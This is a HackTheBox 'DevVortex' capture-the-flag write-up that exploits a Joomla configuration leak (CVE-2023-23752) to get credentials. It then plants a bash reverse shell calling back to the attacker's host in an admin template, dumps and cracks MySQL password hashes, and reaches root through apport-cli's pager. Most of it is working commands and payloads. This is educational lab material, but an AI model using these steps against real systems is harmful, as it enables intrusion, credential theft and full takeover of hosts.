HackTheBox DevVortex Writeup

Explore the fundamentals of cybersecurity with the DevVortex Capture The Flag (CTF) challenge, an easy-level experience ideal for beginners! This straightforward CTF writeup offers clear insights into key concepts, presented with clarity and simplicity.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.242 devvortex.htb dev.devvortex.htb

The dev.devvortex.htb subdomain was found with a DNS subdomain brute-forcer such as gobuster:

gobuster dns -d "devvortex.htb" -w subdomains-top1million-5000.txt -t "$(nproc)"

This ensures that your system can resolve the domain names devvortex.htb and dev.devvortex.htb to the correct IP address 10.10.11.242.

Script to add hosts automatically

ip="10.10.11.242"
domain="devvortex.htb dev.devvortex.htb"
# Append the entry only if an identical line is not already present
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV devvortex.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Gather Information From Joomla

Joomla versions affected by CVE-2023-23752 expose site configuration values, including the database credentials, through an API endpoint that does not require authentication. Use the following command to retrieve them:

curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s

This command fetches the configuration data from the URL in silent mode (-s) and prints the JSON response.

Script to parse the user, password and database prefix from the result:

URL="http://dev.devvortex.htb/api/index.php/v1/config/application?public=true"
# Fetch the response once; every entry of .data carries a single attribute key
JSON=$(curl -s "$URL")
DB_USER=$(echo "$JSON" | jq -r '.data[] | select(.attributes.user) | .attributes.user')
DB_PASSWORD=$(echo "$JSON" | jq -r '.data[] | select(.attributes.password) | .attributes.password')
DB_PREFIX=$(echo "$JSON" | jq -r '.data[] | select(.attributes.dbprefix) | .attributes.dbprefix')
echo -e "dev.devvortex.htb/administrator webpage credentials:\n usr: $DB_USER\n pasw: $DB_PASSWORD\n dbprefix: $DB_PREFIX"
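As an added example (not code from the original post), the following Python script parses the same response shape the jq one-liners above rely on and reports which sensitive configuration keys came back to an unauthenticated client, so an administrator can verify whether a Joomla instance they run is affected. The two sample responses and the check_instance helper are constructed here; only the sd4fg_ prefix comes from this writeup.

```python
import json
import urllib.error
import urllib.request

# Constructed sample of the shape returned by /api/index.php/v1/config/application:
# every element of "data" carries exactly one configuration key under "attributes".
# All values are made up (the prefix sd4fg_ is the one this writeup mentions).
LEAKING_RESPONSE = json.dumps({
    "data": [
        {"type": "application", "id": 224, "attributes": {"offline": False}},
        {"type": "application", "id": 224, "attributes": {"sitename": "Development"}},
        {"type": "application", "id": 224, "attributes": {"dbtype": "mysqli"}},
        {"type": "application", "id": 224, "attributes": {"host": "localhost"}},
        {"type": "application", "id": 224, "attributes": {"user": "example_dbuser"}},
        {"type": "application", "id": 224, "attributes": {"password": "example_dbpass"}},
        {"type": "application", "id": 224, "attributes": {"db": "joomla"}},
        {"type": "application", "id": 224, "attributes": {"dbprefix": "sd4fg_"}},
    ],
})

# A constructed response that carries no database settings, for comparison.
CLEAN_RESPONSE = json.dumps({"data": [
    {"type": "application", "id": 224, "attributes": {"offline": False}},
    {"type": "application", "id": 224, "attributes": {"sitename": "Development"}},
]})

SENSITIVE_KEYS = ("user", "password", "db", "dbprefix", "host", "secret")


def flatten_attributes(body):
    """Merge the one-key-per-entry data[].attributes list into a single dict."""
    merged = {}
    for entry in json.loads(body).get("data", []):
        merged.update(entry.get("attributes") or {})
    return merged


def exposed_sensitive_keys(body):
    """Sensitive configuration keys present with a non-empty value in the response."""
    attrs = flatten_attributes(body)
    return [k for k in SENSITIVE_KEYS if attrs.get(k) not in (None, "")]


def check_instance(base_url, timeout=10):
    """Query a Joomla site you administer; an empty list means nothing sensitive came back."""
    url = base_url.rstrip("/") + "/api/index.php/v1/config/application?public=true"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return exposed_sensitive_keys(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError:
        return []  # the request was rejected (e.g. 401/403), so nothing was disclosed
```

Run check_instance("http://dev.devvortex.htb") from the attacking host to reproduce the writeup's finding, or against your own site to confirm the endpoint no longer answers unauthenticated requests.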

Log in to Joomla Admin Panel

Access the Joomla administrator webpage at:

http://dev.devvortex.htb/administrator

Navigate to System > Administration Templates > index.php and add the following command after <?php:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

system('/bin/bash -c "bash -i >& /dev/tcp/<vpn-ip>/9001 0>&1"');

Then, start a listener on port 9001 to catch the reverse shell:

nc -lvnp 9001

Trigger the command execution by visiting the administrator webpage:

curl -s http://dev.devvortex.htb/administrator/index.php

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm

Extract Password Hash From MySQL

Log in to MySQL with the credentials recovered from the Joomla API, selecting the joomla database:

mysql -u '<user>' --password='<password>' joomla

Extract the password hash:

show tables;
select * from sd4fg_users;

Brute Force the Hash

Use a hash-cracking tool such as hashcat or John the Ripper to run a dictionary attack against the password hash, or use an online service such as CrackStation.

echo -n "Password Hash? --> " ; read -r hash
echo "$hash" > /tmp/hash.txt
# -m 3200 selects bcrypt, the hash format Joomla stores in its users table
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -f /tmp/hash.txt

SSH Login with Discovered Password

Once you find the password, log in via SSH using the discovered credentials:

ssh logan@devvortex.htb

Obtain User Flag

Retrieve the user flag by running the following command:

cat "$HOME/user.txt"

Privilege Escalation

Run sudo -l to list the programs that can be run as root.

Execute the following steps for privilege escalation:

  1. Run the command:
sudo /usr/bin/apport-cli -f
  2. At the prompts, send input 1, then send input 2.
  3. View the report and wait for approximately 10 seconds.
  4. At the pager prompt, type:
:!/bin/bash

This command exploits the less utility to spawn a shell, as described in GTFOBins.

This works because apport-cli uses less under the hood and is executed as root, so the shell spawned from the pager inherits root privileges.

Obtain Root Flag

cat /root/root.txt

This post is licensed under CC BY 4.0 by the author.